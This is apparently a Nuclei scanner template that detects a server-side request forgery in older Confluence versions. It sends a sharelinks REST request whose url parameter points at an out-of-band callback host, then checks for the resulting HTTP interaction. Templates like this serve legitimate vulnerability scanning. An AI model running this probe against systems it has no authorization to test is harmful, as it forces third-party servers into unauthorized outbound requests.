id: confluence-ssrf-sharelinks

info:
  name: Confluence SSRF in sharelinks
  author: TechbrunchFR
  severity: medium
  description: Vulnerable should be Confluence versions released from 2016 November and older
  reference: |
    - https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks
    - https://github.com/assetnote/blind-ssrf-chains#confluence
  tags: confluence,atlassian,ssrf,jira,oob

requests:
  - method: GET
    path:
      - '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/'
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
